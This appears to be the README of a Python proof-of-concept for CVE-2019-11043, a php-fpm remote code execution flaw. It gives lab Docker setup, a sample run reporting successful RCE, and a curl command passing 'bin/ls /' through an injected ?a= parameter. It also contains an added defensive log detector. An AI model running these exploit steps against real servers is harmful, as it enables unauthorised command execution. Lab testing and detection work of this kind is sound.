(PoC) Python version of CVE-2019-11043 exploit by neex

PoC CVE-2019-11043

A Python version of the CVE-2019-11043 exploit
This PoC is still a draft; please use the exploit written by @neex.
Vulnerability Analysis:

PoC Setup

Just run docker compose to bring up nginx and php-fpm:

# docker-compose up -d
Creating network "cve-2019-11043-git_app_net" with driver "bridge"
Creating php   ... done
Creating nginx ... done

If you wish to read the php-fpm logs, you can run:

docker logs --tail 10 --follow php


# python3 --url http://localhost/index.php
[*] QSL candidate: 1752, 1757, 1762
[*] Target seems vulnerable: PHPSESSID=05b156ea034b903de6624f09c513541c; path=/
[*] RCE successfully exploited!

    You should be able to run commands using:
    curl http://localhost/index.php?a=bin/ls+/
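
For defenders, the run above leaves a recognisable trail in the nginx access log of the lab container. The following detector is an added example, not part of this repository or of @neex's exploit; it assumes "QSL" in the output means query-string length, that the log uses nginx's combined format, and that the thresholds and the constructed sample lines are reasonable stand-ins for a real log.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit

QSL_MIN = 1500   # assumed threshold, just below the candidates printed above
SWEEP_MIN = 3    # assumed: distinct long lengths from one client to one script
REQ = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*"')

def _line(ip, target):
    """Build one constructed access-log line in nginx 'combined' format."""
    return f'{ip} - - [29/Oct/2019:10:00:00 +0000] "GET {target} HTTP/1.1" 200 12 "-" "-"'

# Constructed sample log, not captured traffic.
SAMPLE_LOG = [_line("203.0.113.7", "/index.php?" + "Q" * n)
              for n in (1752, 1757, 1762, 1767)]
SAMPLE_LOG += [
    _line("203.0.113.7", "/index.php?a=bin/ls+/"),
    _line("198.51.100.4", "/index.php?page=2"),
    _line("198.51.100.4", "/search.php?q=" + "x" * 1800),  # long, but no sweep
    "malformed line",
]

def detect(lines):
    """Return one finding per (client, script) that swept long query strings."""
    sweeps = defaultdict(set)      # (ip, path) -> distinct long query lengths
    followups = defaultdict(list)  # (ip, path) -> later ?a=... requests
    for line in lines:
        m = REQ.match(line)
        if not m:
            continue               # skip lines that are not in combined format
        ip, target = m.groups()
        url = urlsplit(target)
        if ".php" not in url.path:
            continue
        key = (ip, url.path)
        if len(url.query) >= QSL_MIN:
            sweeps[key].add(len(url.query))
        elif url.query.startswith("a=") and key in sweeps:
            followups[key].append(target)
    return [{"client": ip, "script": path, "qsl": sorted(lens),
             "followups": followups[(ip, path)]}
            for (ip, path), lens in sweeps.items() if len(lens) >= SWEEP_MIN]

if __name__ == "__main__":
    for finding in detect(SAMPLE_LOG):
        print(finding)
```

A single long query string is not flagged; only a client that tries several distinct long lengths against the same script is, and any `?a=` request it sends afterwards is attached to the finding.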

If you want to check the vulnerability only, skipping the exploit:

python3 --url http://localhost/index.php --skip-rce
python3 --url http://localhost/index.php --reset

You can try to kill the php-fpm process and reset all injected PHP settings with --reset:

python3 --url http://localhost/index.php --reset

Video PoC
